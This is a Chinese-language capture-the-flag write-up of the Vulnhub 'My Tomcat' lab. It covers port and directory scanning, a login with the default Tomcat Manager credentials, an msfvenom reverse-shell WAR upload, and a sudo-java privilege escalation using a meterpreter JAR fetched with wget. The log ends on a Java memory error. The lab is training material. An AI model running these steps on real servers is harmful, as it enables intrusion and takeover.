My Tomcat
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ sudo netdiscover -i eth1
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.112 08:00:27:33:cf:b8 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:d4:8b:8a 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.112
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.112 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 21:27 EST
Nmap scan report for localhost (192.168.56.112)
Host is up (0.00072s latency).
Not shown: 65381 filtered tcp ports (no-response), 152 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
| 256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
|_ 256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
8080/tcp open http Apache Tomcat 9.0.31
|_http-title: Apache Tomcat/9.0.31
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:33:CF:B8 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.89 seconds
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
目标主机开放两个端口22(SSH)以及8080(http)
Get Access
Kali Linux利用浏览器访问8080端口,返回Tomcat默认页面。
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ curl http://192.168.56.112:8080/robots.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /robots.txt</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.31</h3></body></html>
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ gobuster dir -u http://192.168.56.112:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.112:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/09 21:32:58 Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/manager (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww (Status: 400) [Size: 804]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 804]
/axis2 (Status: 302) [Size: 0] [--> /axis2/]
/http%3A%2F%2Fblogs (Status: 400) [Size: 804]
/http%3A%2F%2Fblog (Status: 400) [Size: 804]
/**http%3A%2F%2Fwww (Status: 400) [Size: 804]
/External%5CX-News (Status: 400) [Size: 795]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 804]
/http%3A%2F%2Fradar (Status: 400) [Size: 804]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 804]
/http%3A%2F%2Fweblog (Status: 400) [Size: 804]
/http%3A%2F%2Fswik (Status: 400) [Size: 804]
Progress: 219915 / 220561 (99.71%)===============================================================
2022/11/09 21:34:07 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ nikto -h http://192.168.56.112:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.112
+ Target Hostname: 192.168.56.112
+ Target Port: 8080
+ Start Time: 2022-11-09 21:34:19 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ dirb http://192.168.56.112:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 9 21:38:01 2022
URL_BASE: http://192.168.56.112:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.112:8080/ ----
+ http://192.168.56.112:8080/axis2 (CODE:302|SIZE:0)
+ http://192.168.56.112:8080/docs (CODE:302|SIZE:0)
+ http://192.168.56.112:8080/examples (CODE:302|SIZE:0)
+ http://192.168.56.112:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://192.168.56.112:8080/host-manager (CODE:302|SIZE:0)
+ http://192.168.56.112:8080/manager (CODE:302|SIZE:0)
-----------------
END_TIME: Wed Nov 9 21:38:08 2022
DOWNLOADED: 4612 - FOUND: 6
扫描出来/manager目录,利用互联网检索一下tomcat manager的默认用户名和密码,tomcat tomcat,尝试登陆/manager页面,成功登录!!
发现可以上传文件,看是否可以用Msfvenom制作war文件
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.107 LPORT=5555 -f war > shell.war
Final size of war file: 1102 bytes
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ ls
nmap_full_scan shell.war
发现成功上传shell.war到目标主机
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.112] 48230
id
uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
提权
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ ls /
ls /
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tomcat:x:998:997::/usr/local/tomcat9/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
bash-4.2$ cat /etc/*release
cat /etc/*release
CentOS Linux release 7.7.1908 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
CentOS Linux release 7.7.1908 (Core)
CentOS Linux release 7.7.1908 (Core)
bash-4.2$ uname -a
uname -a
Linux my_tomcat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ cd /home
cd /home
bash-4.2$ ls -alh
ls -alh
total 4.0K
drwxr-xr-x. 2 root root 6 Jun 9 2014 .
dr-xr-xr-x. 17 root root 4.0K Feb 21 2020 ..
bash-4.2$ sudo -l
sudo -l
Matching Defaults entries for tomcat on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User tomcat may run the following commands on this host:
(ALL) NOPASSWD:
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
查看sudo -l的输出结果,我们可以用利用命令 /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java进行提权
利用msfvenom再制作一个jar 反弹脚本(不是war,由java直接运行jar包,而war由tomcat运行)
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.107 LPORT=6666 -f jar -o escalate.jar
Payload size: 5270 bytes
Final size of jar file: 5270 bytes
Saved as: escalate.jar
在kali linux本地利用Python启动http,然后靶机上下载escalate.war脚本
bash-4.2$ wget http://192.168.56.107:8000/escalate.jar
wget http://192.168.56.107:8000/escalate.jar
--2022-11-09 22:10:28-- http://192.168.56.107:8000/escalate.jar
Connecting to 192.168.56.107:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5270 (5.1K) [application/java-archive]
Saving to: ‘escalate.jar’
100%[======================================>] 5,270 --.-K/s in 0s
2022-11-09 22:10:28 (428 MB/s) - ‘escalate.jar’ saved [5270/5270]
bash-4.2$ ls
ls
escalate.jar hsperfdata_root hsperfdata_tomcat
bash-4.2$ sudo -u root /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar /tmp/escalate.jar
<k-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar /tmp/escalate.jar
bash-4.2$
Kali Linux成功得到反弹
──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.112] 56162
id
但是不知道怎么回事,报以下错误,似乎是内存不足:
java.lang.OutOfMemoryError: Java heap space
at metasploit.Payload.bootstrap(Unknown Source)
at metasploit.Payload.main(Unknown Source)